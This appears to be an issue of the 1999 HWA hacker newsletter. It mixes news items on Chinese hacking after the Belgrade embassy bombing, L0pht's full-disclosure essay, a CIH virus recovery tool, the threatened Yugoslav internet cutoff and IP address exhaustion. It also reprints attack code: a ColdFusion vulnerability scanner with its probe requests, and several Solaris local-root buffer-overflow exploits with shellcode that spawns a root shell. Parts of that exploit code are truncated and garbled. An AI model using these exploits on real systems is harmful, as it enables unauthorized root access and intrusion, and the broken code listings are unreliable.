May 10, 1999, 8:15 a.m. PT
URL: http://www.news.com/News/Item/0,4,36311,00.html

BEIJING--Chinese computer buffs flooded cyberspace with anti-U.S. rhetoric today, hacking into a U.S. embassy Web site and overloading chat rooms with condemnation of the NATO bombing in Yugoslavia.

As angry protesters hit the pavement in a more traditional form of outrage, hurling whatever came to hand at the U.S. and British embassies in Beijing, China's wired elite logged on to vent their anger.
More than 24,000 protest messages have been posted on one popular chatroom at Netease.com since three NATO missiles slammed into the Chinese embassy compound in Belgrade Friday night, killing three journalists and injuring more than 20 people.

Most of the postings were one-line invectives against President Clinton or the NATO bombing campaign in Yugoslavia. But others focused on ways to retaliate for the strike.

"Our strongest weapon is for the masses to begin a campaign to boycott American goods," wrote one user. "This is what the Americans are most scared of. Americans love money and they listen the most to taxpayers. If they lose economic gains then they lose the essentials."

Another user, writing under the name "KILL-USA," called on China to make use of the situation to push for entry into the World Trade Organization. One urged his counterparts to pirate U.S. software to cripple the American economy.

Others condemned students and workers who had attacked foreign journalists covering violent protests outside the U.S. embassy over the weekend. "The anger in our hearts must not lead us to lose reason and curse and beat foreigners when we see them," wrote a user called Chinese Kung Fu.

The outpouring of angst on the Web was so great that many of China's most popular sites added additional servers to keep up with the demand. The popular Sohu.com also set up a special site to gather responses to the attack on the Chinese embassy and was receiving one response every second earlier today.

In addition to the Web postings, Chinese hackers twice assailed the U.S. embassy Web site, replacing the home page with text reading "down with barbarians," the state-run China Daily reported. Today the Web site could be accessed through an American server, but the Chinese route was blocked.
Word of the bombing spread rapidly on the Internet--in contrast to the many hours the official media took to report it--and many students said they first heard about street protests in Beijing on the Web. More than 2 million Chinese use the Internet, one of the only forums of expression free from government oversight.

Story Copyright © 1999 Reuters Limited. All rights reserved.

@HWA

26.0 Full Disclosure, the only way to go.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Full Disclosure - The Only Way to Be Sure
contributed by remage

A rather interesting rant has been posted by L0pht Heavy Industries, Inc. The rant covers the issue of Full Disclosure, which has been argued about and argued about. In the wake of the recent showcode-Webtrends-L0pht-Microsoft advisory the L0pht makes a very convincing argument that Full Disclosure is the only way to protect those who are vulnerable.

L0pht Heavy Industries, Inc.
http://www.l0pht.com/

05.10.1999

There is a new trend in the reporting of security vulnerabilities these days. Many of the problems are being reported by companies that make products to detect these problems. While more people researching the security of products is a good thing, it is certainly having an effect on the free flow of security information. Sometimes this effect is to the detriment of the customers of the product that the flaw exists in.

If a company makes a product that scans for security problems, they are going to want to add their newly discovered vulnerability to their list of things to scan for. They are probably, depending on the seriousness of the problem they have uncovered, going to want to make the advisory of the problem into a full scale press release that will hype their product. Usually the press release won't really tell you how to find the problem or how to solve it. You are going to need to download their product for that.
When security problems exist on production servers accessible from the internet, time is critical. Every day that goes by is another day that the server is exposed. How many people know about the problem? Who is actively exploiting it? It is impossible to tell. Good ethical security practice is to tell the people affected quickly, especially if there are steps they can take to mitigate or eliminate the risk themselves.

The L0pht recently found a problem with Microsoft's IIS 4.0 web server, the showcode problem. It allowed web users to read files anywhere on the web server where the file permissions were set to be world-readable. This turns out to be the case in many web servers that are not locked down properly. The L0pht was surprised at how widespread the problem was. Many high profile e-commerce servers were affected. Many, many corporate web servers were affected.

The research of the problem, which took less than a day, came up with a simple solution. Delete the sample files which made the machine vulnerable. They don't need to be on production servers anyway. We crafted an advisory and gave out the solution.

When we reported this to Microsoft they said that they had known about the problem for "several weeks". They had been notified by WebTrends about the problem, were researching it, and would issue a Security Bulletin. It didn't seem to be so complicated an issue that it would take several weeks to research. And the fix was simple. Just delete the files. No need to download a hotfix or even tweak the registry. What was taking so long?

The L0pht released the showcode advisory to Bugtraq, computer industry reporters, and Microsoft on May 7, 1999, 9:30am EST. Later that day, approximately 1:40 pm EST, WebTrends released a press release about the same problem. It spoke of how WebTrends had discovered the problem. The WebTrends press release didn't tell how to detect the problem and had no solution to the problem.
Two things that were present in the L0pht advisory. It seemed that you had to download and run their product if you wanted this information. It makes one wonder if the press release was put out at that particular time because the L0pht had informed the public about the problem first. It makes one wonder why Microsoft kept this problem and easy solution to themselves for several weeks.

Many crackers keep security vulnerabilities secret so that they can exploit them without worrying about vendor patches or fixes by system administrators. This is looked down upon highly by the security community as totally unethical. Why keep the vulnerabilities secret unless you are going to exploit them, or perhaps trade them for something? Now we have software vendors keeping things secret. At least secret for a substantial period of time. Is this the way we want the industry to behave?

This is why full disclosure mailing lists such as Bugtraq and web sites such as Packet Storm Security are so important. They allow customers to get vulnerability reports, and hopefully fixes, in a timely manner. There is no centralized clearinghouse such as the software vendor or some government agency to slow things up for their own ends. Vulnerability information is extremely valuable both to attackers and customers. Companies and organizations that release this information openly and as soon as possible are doing the security community a service. Those who choose to use the information for their own purposes first put customers at risk.

@HWA

27.0 NIPC releases Hax0r Notes erh, Cyber Notes an online newsletter..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

NIPC releases CyberNotes
contributed by Simple Nomad

The National Infrastructure Protection Center (NIPC), which is essentially being run by the FBI, has released online copies of "CyberNotes", the newsletter whose mission is to "support security and information system professionals with timely information on cyber vulnerabilities, hacker exploit scripts, hacker trends, virus information, and other critical infrastructure-related best practices". It reads like a government version of numerous hacker web sites. Our tax dollars at work.

NIPC Cyber Notes
http://www.nipc.gov/nipc/nipcpublic.htm

Oh, and if you have never visited the NIPC web site it is good for a laugh or two.

National Infrastructure Protection Center
http://www.nipc.gov/

@HWA

28.0 Cure for CIH
~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Cure for CIH Found
contributed by Scores

A student in Bangladesh claims to have found a cure for the CIH or Chernobyl virus that wiped out thousands of systems world wide last month. Monirul Islam Sharif, an undergraduate computer science student, claims that a 70K-byte C language program he has named MRECOVER will recover the FAT table and the first partition of a FAT16 table.

Computer World
http://www.computerworld.com/home/news.nsf/all/9905101cih

MRECOVER
http://members.xoom.com/monirdomain

Student touts 'Chernobyl' cure
By Sanjit Singh

NEW DELHI -- One student invented it, but another has written an antidote to help users who lost data to the CIH computer virus. The Chernobyl virus, also known as CIH, was invented by onetime Taiwanese student Chen Ing-hau and caused havoc all over Asia April 26, infecting thousands of PCs in South Korea, Singapore, India, Bangladesh and China. (Most major U.S. corporations with updated antivirus software escaped serious damage.) But it now has a cure, courtesy of Monirul Islam Sharif, an undergraduate computer science student at Dhaka University in Bangladesh.
Sharif, 21, said he wrote the 70K-byte C language program, which he called MRECOVER, in 24 hours. "I started working on it on April 27, when a friend brought his infected hard drive to me, and by the next day, it worked when I tried it out. Most of the data on the disk was recovered," he said.

Sharif tried it on several other computers at Dhaka, and it worked there, too, recovering data in minutes. "If your machine uses FAT [File Allocation Table], MRECOVER will recover all the data on the disk within three to four minutes. But if your computer uses FAT 16, then it will recover all data after the first partition, limiting the recovery to between 40 and 60 percent," Sharif said. He added that the antidote doesn't work on hard drives with a capacity of 8G bytes or more.

The program is free to use and has been posted on the Web at http://members.xoom.com/monirdomain for anybody who wants to download it. A new and improved version for machines that use FAT 16 will be ready within days and followed by one for large-capacity hard drives.

Sharif said he has received 3,000 hits and innumerable e-mail messages since he put MRECOVER on the Internet May 5, but the inventor doesn't see any commercial gain from the program.

Sharif, who was born in England and spent his early childhood there, graduates next June. He said his ambition is to head to the U.S. for higher studies. "I would like to go to the U.S. to do a master's in computer science. But it's unlikely that I will specialize in antivirus programs. I still find general programming much more interesting," he said.

@HWA

29.0 Anonymous web browsing from 303.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Anonymous Web Surfing
Contributed by Netmask

303.org is now offering anonymous web surfing: set your browser to use 303.org as the HTTP proxy server, on port 1050. This server will forward the type of client you use, but not the IP address.
More info available at 303.org
http://www.303.org

@HWA

30.0 Yugoslavia Offline?
~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

YUGOSLAVIA OFFLINE
by BHZ, Wednesday 12th May 1999 on 9:30 pm CET

It looks like Yugoslavia's Internet users will be offline for a long time. As stated on www.beograd.com: "We have reliable information that the US Government ordered shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO air war against this country. This action might be taken as soon as later tonight or tomorrow (May 12 or 13, 1999)". Press release below.

May 12, 1999

US shuts down Yugoslav Internet - For immediate release

BELGRADE, MAY 12 - We have reliable information that the US Government ordered shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO air war against this country. This action might be taken as soon as later tonight or tomorrow (May 12 or 13, 1999). This is a flagrant violation of commercial contracts with Yugoslav ISPs, as well as an attack on freedom of the Internet. A Web site in protest of these actions should be up shortly. We will supply you with the URL. In the meantime, please be so kind to inform as many people as possible about this tragic event for the Internet community in Yugoslavia and Europe.

BeoNET
Belgrade, Yugoslavia

May 13th
Contributed by cyberdiva

From Beograd.com:

16:50 According to the last information, "LORAL ORION" has given up, until further notice, disconnecting Yugoslavia from the Internet, because of the protests from all around the world that followed the announcement.

15:55 FONET - One of the biggest US communication satellites of the firm "LORAL ORION" has informed Belgrade provider "Informatika" last night that because of "vis major" they would have to stop Internet emitting toward all Yugoslav providers who are linked to providers in the USA.
"This decision is the result of the executive order of the President of USA, Bill Clinton, banning emitting of all services from USA into Federal Republic of Yugoslavia (Serbia and Monte Negro)", says the message of "LORAL ORION" to the general Director of "Informatika", Slobodan Sreckovic. "In accordance with that, LORAL ORION will, starting from May 12, 1999, stop its services", it is said at the end of the statement. On Thursday, May 13, in morning hours, "Informatika" confirmed to Fonet this has not happened yet, but they are expecting to be disconnected from USA Internet satellite service toward Yugoslavia "any minute/hour now".

--diva

May 14th

RE: Internet connection in Yugoslavia

Now the mainstream media has picked it up and although Loral for the time has relented, it looks like the Clinton administration is still considering it.

Clinton Deciding Whether to Cut Yugoslavia Internet Access

I don't have to remind you there has been no formal declaration of WAR by the United States. It makes me wonder how private companies are going to be able to secure global business if underneath it all, they are forced to do the political bidding of the United States against their own customers... Hacker News Network is doing an expose on the story going up today as well.

Thanks for hearing me out...

--diva

FoxNews;

Clinton Deciding Whether to Cut Yugoslavia Internet Access
8.08 a.m. ET (1208 GMT) May 14, 1999

WASHINGTON -- Confronted with a dilemma of war in the information age, the Clinton administration is trying to decide whether its trade embargo extends to Internet access for some of Yugoslavia's citizens.

Loral Space and Communications Ltd. of New York said it may be forced to cut transmissions into Yugoslavia from one of its satellites, which serves at least two of the country's major Internet providers.

"We're still not clear on this whole thing," said Jeannette Colnan, a spokeswoman for Loral Space.
President Clinton issued an executive order two weeks ago banning U.S. companies from selling or supplying to Yugoslavia "any goods, software, technology or services," although the order allows for the "special consideration of the humanitarian needs of refugees."

The National Security Council said information services are generally considered exempt from trade embargoes, but that electronic commerce is affected. The Internet performs both functions. "We'll need to inquire further about the appropriate applications of the law," said David Leavy, a spokesman for the security council.

Loral Space said Thursday that it was discussing its obligations under the embargo with the Treasury Department, which didn't respond to requests for comment.

Experts said any move by the United States to limit civilian use of the Internet would be unprecedented. NATO has already attacked Serbian broadcast stations to stem what it describes as propaganda, and Serbs have established an extraordinary network on the Internet criticizing ongoing air strikes. But the Internet also serves as a conduit for civilians to receive unadulterated news reports about NATO efforts.

"The Internet remains at this point one of the major sources inside Yugoslavia for objective news reporting about the war," said Jim Dempsey of the Washington-based Center for Democracy and Technology.

Word of the threat to shut down Internet access to at least parts of Yugoslavia spread quickly across the global network, where it was condemned in some e-mail messages and online discussion groups.

"To put it bluntly, we somehow got used to air-raid sirens, bombings and threats of invasion, but we don't know how we're going to survive without the Internet," said Alex Krstanovic, co-founder of Beonet, one of the Internet providers in Yugoslavia.

But some argued that access should be cut off. "Continuing to provide these services would be kind of like giving aid to the enemy," one person wrote.
The possible loss of Internet access also illustrated the fragility of the computer network and the importance assigned to it internationally. Computer traffic in Yugoslavia uses both satellite and traditional land-based telephone lines, but the loss of the Loral satellite could dramatically reduce the Internet bandwidth available to citizens there, causing slow connections or even blackouts.

Web sites reliant on the Loral satellite continued to be accessible overnight Thursday, and there were no substantiated reports of anyone unable to retrieve information from outside the country using the Internet. A spokeswoman at the organization that registers Web addresses ending with the country's "yu" suffix said that she was familiar with the reports but that there had been no problems yet.

@HWA

31.0 Spam Recycling site deals with spammers for you
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Who75

http://www.maximumpcmag.com/inside_sources/99.5/99.5.11.phtml

Site Offers To ''Recycle'' Spam

If you feel guilty about tossing an aluminum can in the garbage, spamrecycle.com may be the site for you. The site is offering to "recycle" spam you send the site and submit it for complaint to the proper authorities. Although it may sound like a shell company spam artists use to farm more e-mail accounts, spamrecycle.com is supported by the Coalition Against Unsolicited Commercial E-mail.

Spamrecycle.com officials said the site was created to help people fight spam. Many spam perpetrators give e-mail addresses that offer to remove the spam victim from further unsolicited email. Unfortunately, in many cases, the e-mail only validates the victim's e-mail address, causing more spam to pour in.

Spamrecycle.com is sponsored by CDnow.com, which is giving people who recycle their spam a $5 coupon towards purchases from the site.
@HWA

32.0 quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml

/*
   Quickie Coldfusion exploit finder v1.0

   After seeing all the super lame hacks by groups desperately seeking media
   wh0rage, like JPs new favorite group, Team spl0it, and all the lame crap
   they were using, I decided to help them in their quest to look lame. Most
   of the 'tools' these people were releasing were nothing more than modified
   versions of my cgiscanner (cgiscan.c), so here is a newly coded, faster
   scanner for them to use and rip off.

   If I find this code, like the rest of my code, on JPs code site, with my
   name cleverly removed, I am going to go take a shit on the hood of his car.
   This should also give McIntyre and Jericho some more sites to put in their
   hacked site archive on attrition.org that JP can rip off to. They have
   already shit on his car.

   This scanner scans an entire class C address, and does it with no bull.
   Enter the starting IP address, then the one you want to stop on, and it
   will scan each box for the 3 parts of the bug.

   compiles on HP-UX, Linux, *BSD

   to compile:
      luser$ gcc quickie.c -o quickie

   to run:
      luser$ ./quickie 123.123.123.2 123.123.123.254 >> somelog &

   coded by Bronc Buster
   May 1999
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

/* sets the timeout for connect() - you can change it if you want */
#define TOUT 2

/*****************************************************/
/* begin eLe3t prototypes                            */
/*****************************************************/
void phalse(int signo);
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec);
void clean(char b[1024]);
/*****************************************************/
/* end eLe3t prototypes                              */
/*****************************************************/

int main(int argc, char **argv)
{
   char *temp;
   char *ip_ptr;
   char buff[1024];      /* who cares, we only want to HTTP header */
   int f1,f2,f3,f4;      /* f1.f2.f3.f4 when we disassemble first IP */
   int l1,l2,l3,l4;      /* l1.l2.l3.l4 when we disassemble last IP */
   int i, tmp, n, lame;
   int sock;
   struct sockaddr_in target;
   char *coldf[4];
   char *dis[4];

   /* this is just for a pretty print */
   dis[1] = "openfile.cfm";
   dis[2] = "exprcalc.cfm";
   dis[3] = "displayopenedfile.cfm";

   /* checks for coldfusion bugs */
   coldf[1] = "GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
   coldf[2] = "GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
   coldf[3] = "GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";

   if(argc<2)
      exit(printf("\nUsage: %s start_ip ending_ip\n",argv[0]));

   printf("\n** A fast coldfusion exploit finder **");
   printf("\ncoded by Bronc Buster - May 99\n");

   /* parse ripped from HoGs HeaD domain scanner with a little */
   /* modification - works good                                */

   /* parse first ip - sorry no error checking */
   temp=argv[1];
   ip_ptr=(char *)strtok(temp,".");    /* get first field and look for . */
   f1=atoi(ip_ptr);
   ip_ptr=(char *)strtok(NULL,".");    /* null pointer set, get next field */
   f2=atoi(ip_ptr);
   ip_ptr=(char *)strtok(NULL,".");    /* null pointer set, get next field */
   f3=atoi(ip_ptr);
   ip_ptr=(char *)strtok(NULL,".");    /* null pointer set, get next field */
   f4=atoi(ip_ptr);

   /* parse second ip */
   temp=argv[2];
   ip_ptr=(char *)strtok(temp,".");    /* get first field and look for . */
   l1=atoi(ip_ptr);
   ip_ptr=(char *)strtok(NULL,".");    /* null pointer set, get next field */
   l2=atoi(ip_ptr);
   ip_ptr=(char *)strtok(NULL,".");    /* null pointer set, get next field */
   l3=atoi(ip_ptr);
   ip_ptr=(char *)strtok(NULL,".");    /* null pointer set, get next field */
   l4=atoi(ip_ptr);
   /* end parsing */

   /* class C range checking - morons 'might' use the - hehehe */
   if(f4<2 || l4>254)
      exit(printf("IP Numbers out of range\n"));

   /* class C only - anyone with a brain can make */
   /* this scan class B or A nets - wow kidiez!   */
   for (i=f4;i<=l4;i++)
   {
      /* reconstruct the IP into a string */
      sprintf(temp,"%d.%d.%d.%d",f1,f2,f3,i);
      bzero(&target,sizeof(target));
      target.sin_addr.s_addr=inet_addr(temp);
      target.sin_family=AF_INET;
      target.sin_port=htons(80);

      /* ok, so this is a lame loop */
      for(lame=1;lame;lame--)
      {
         printf("\nChecking %s:",temp);

         /* check for all 3 before we jump for joy */
         for(n=1;n<4;n++)
         {
            sock=socket(AF_INET,SOCK_STREAM,0);
            if(sock<0)
               exit(printf("Error getting socket - socket()\n"));

            if(connect_time(sock,(struct sockaddr *)&target,sizeof(target),TOUT)==-1)
            {
               close(sock);
               printf("\n no HTTPD responce");
            }
            else
            {
               printf("\n checking for %s - ",dis[n]);
               send(sock,coldf[n],strlen(coldf[n]),0);
               recv(sock, buff, sizeof(buff),0);
               if(strstr(buff,"200"))
               {
                  close(sock);
                  clean(buff);
                  printf(" FOUND",dis[n]);
               }
               else
               {
                  close(sock);
                  clean(buff);
                  printf(" not found",dis[n]);
               }
            }
         }
      }
   }
   printf("\n\nScan finished!\n");
   printf("Have fun kiddies!\n");
   return 0;
}

/**************************************************************/
/* eLe3t functions                                            */
/**************************************************************/

/* fake return function for connect_time() */
void phalse(int signo)
{
   return;
}

/* connect with timeout - for speed!@$(*%^@ */
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec)
{
   int s;

   alarm(0);
   signal(SIGALRM,phalse);
   alarm(nsec);

   if((s=connect(sockfd,(struct sockaddr *)saptr,salen))<0)
   {
      close(sockfd);
      if(errno==EINTR);
      errno=ETIMEDOUT;
   }
   alarm(0);
   signal(SIGALRM, SIG_DFL);
   return (s);
}

/* clean out buffer so we don't get fake readings */
void clean(char b[1024])
{
   int i;
   for(i=0;i<=strlen(b);i++)
      b[i]=NULL;
}

/* EOF */

@HWA

33.0 sdtcm_convert local root overflow exploit for Sparc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml

/*=============================================================================
   sdtcm_convert Overflow Exploits( for Sparc Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)

   [usage]
   % gcc ex_sdtcm_convert.c (This example program)
   % a.out
   If no response, hit ctrl+c
   #
=============================================================================
*/
#define ADJUST 2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 6000+16*30
#define NOP 0xa61cc013

char exploit_code[] =
"\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
   __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
int i;

main()
{
   static char x[11000];

   memset(x,'a',10000);
   ret_adr=get_sp()-6300;
   for (i = 0; i < 5000 ; i+=4){
      x[i+3]=ret_adr & 0xff;
      x[i+2]=(ret_adr >> 8 ) &0xff;
      x[i+1]=(ret_adr >> 16 ) &0xff;
      x[i+0]=(ret_adr >> 24 ) &0xff;
   }
   ret_adr=get_sp() - 10200;
   if ((ret_adr & 0xff )==0) ret_adr+=4;
   printf("%lx\n",ret_adr);
   for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
      x[i+3]=ret_adr & 0xff;
      x[i+2]=(ret_adr >> 8 ) &0xff;
      x[i+1]=(ret_adr >> 16 ) &0xff;
      x[i+0]=(ret_adr >> 24 ) &0xff;
   }
   for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
      x[i+3]=NOP & 0xff;
      x[i+2]=(NOP >> 8 ) &0xff;
      x[i+1]=(NOP >> 16 ) &0xff;
      x[i+0]=(NOP >> 24 ) &0xff;
   }
   for (i=0;i> 8 ) &0xff; x[i+0]=(ret_adr >> 16 ) &0xff; x[i+1]=(ret_adr >> 24 ) &0xff; }
   for (i=0;i [Software] -> [Edit] -> [Add] -> [Harddisk] -> Directory: /tmp -> [Ok] )
   # In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/
#include
#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400
#define PKGDIR "mkdir /tmp/EXP"
#define PKGINFO "/tmp/EXP/pkginfo"
#define PKGMAP "/tmp/EXP/pkgmap"
#define NOP 0xa61cc013

char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

unsigned long get_sp(void)
{
   __asm__("mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;

main()
{
   system(PKGDIR);
   putenv("LANG=");
   if ((fp=fopen(PKGMAP,"wb"))==NULL){
      printf("Can not write '%s'\n",PKGMAP);
      exit(1);
   }
   fclose(fp);
   if ((fp=fopen(PKGINFO,"wb"))==NULL){
      printf("Can not write '%s'\n",PKGINFO);
      exit(1);
   }
   fprintf(fp,"PKG=");
   ret_adr=get_sp()-OFFSET;
   while ((ret_adr & 0xff000000) == 0 ||
          (ret_adr & 0x00ff0000) == 0 ||
          (ret_adr & 0x0000ff00) == 0 ||
          (ret_adr & 0x000000ff) == 0)
      ret_adr += 4;
   printf("Jumping address = %lx\n",ret_adr);
   memset(x,'a',4);
   for (i = ADJUST1; i < 1000; i+=4){
      x[i+3]=ret_adr & 0xff;
      x[i+2]=(ret_adr >>8 ) &0xff;
      x[i+1]=(ret_adr >> 16 ) &0xff;
      x[i+0]=(ret_adr >> 24 ) &0xff;
   }
   x[BUFSIZE1]=0;
   fputs(x,fp);
   fprintf(fp,"\n");
   fprintf(fp,"NAME=");
   memset(x,'a',4);
   for (i = ADJUST2; i < BUFSIZE2; i+=4){
      x[i+3]=NOP & 0xff;
      x[i+2]=(NOP >> 8 ) &0xff;
      x[i+1]=(NOP >> 16 ) &0xff;
      x[i+0]=(NOP >> 24 ) &0xff;
   }
   for (i=0; i

To: BUGTRAQ@netspace.org
Subject: Solaris2.6,2.7 dtprintinfo exploits

Hello.

"dtprintinfo" is a suid program; the stack buffer can be overflowed by the '-p' option. I made an exploit program that can get root for the Intel edition of Solaris2.6 and Solaris 2.7. Please test it. If you test this program, please set the DISPLAY environment correctly before execution.

/*========================================================================
   ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
   The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
   Written by UNYUN (unewn4th@usa.net)
========================================================================
*/
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;

char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
   __asm__(" movl %esp,%eax ");
}

main()
{
   putenv("LANG=");
   for (i=0;i> 8 ) &0xff; x[i+2]=(ret_adr >> 16 ) &0xff; x[i+3]=(ret_adr >> 24 ) &0xff; }
x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } -------------------------------------------------------------------- Date: Mon, 10 May 1999 13:15:36 JST From: "UNYUN@ShadowPenguin" To: BUGTRAQ@netspace.org Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits] Sorry, I forgot to to write the following things... Before execution of dtprintinfo exploit, please make a dummy lpstat command. for example, % cat > lpstat echo "system for lpprn: server.com" ^D % chmod 755 lpstat % setenv PATH .:$PATH % gcc ex_dtprintinfo.c % a.out Following exploit program is for Sparc Solaris. I tested on Solaris2.6. /*======================================================================== ex_dtprintinfo.c Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) ========================================================================= */ #define ADJUST 0 #define OFFSET 1144 #define STARTADR 724 #define BUFSIZE 900 #define NOP 0xa61cc013 static char x[1000]; unsigned long ret_adr; int i; char exploit_code[] = "\x82\x10\x20\x17\x91\xd0\x20\x08" "\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13" "\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a" "\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd4\xff\xff"; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } main() { putenv("LANG="); for (i = 0; i < ADJUST; i++) x[i]=0x11; for (i = ADJUST; i < 900; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0;i> 8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE]=0; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0); } The Shadow Penguin Security (http://base.oc.to/skyscraper/byte/551) UNYUN (unewn4th@usa.net) @HWA 37.0 Are we 
running out of IP numbers? how many class c's are left?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Net number system at a crossroads By Dan Goodin and Courtney Macavinta Staff Writers, CNET News.com NEWS.COM May 12, 1999, 4 a.m. PT URL: http://www.news.com/SpecialFeatures/0,5,36425,00.html special feature Alongside the highly public debate over domain names, a little-understood predicament--with more far-reaching consequences--is confronting the new nonprofit corporation in charge of the Net's administration. Forget about ".com." The critical resource under the Net's hood is numerical addresses, and the Internet Corporation for Assigned Names and Numbers now is in charge of those, too. Every online device or computer needs an Internet Protocol (IP) numerical address to connect to the global network. When the system was being designed, hardly anyone imagined that its 4.2 billion unique addresses would ever be exhausted. Just a few decades later, however, some in the technical community fear that the rapid pace of innovation one day may cause the Net to run out of numbers. Demand for IP numbers is naturally growing due to the Net's evolution as a meeting place and marketplace. Further draining the IP pool is the aggressive rollout of "always on" cable Net access and the array of handheld devices that need dedicated IP numbers. Currently, most online access providers and companies utilize a small batch of IP addresses by dynamically assigning the numbers based on demand when people log on to their networks. But with broadband services such as cable, customers must have their own dedicated number. "It's going to come to the point where your TV remote is speaking IP to your TV, and they'll each need an IP address," said Paul Vixie, an architect of the Net's address system. Under such a scenario, a typical household could have more than 250 IP addresses, he added. 
     In a way the potential shortage of IP addresses is most analogous to the
     shortage of phone numbers that came about with the advent of fax machines
     and cellular phones, which has spurred the addition of new area codes.

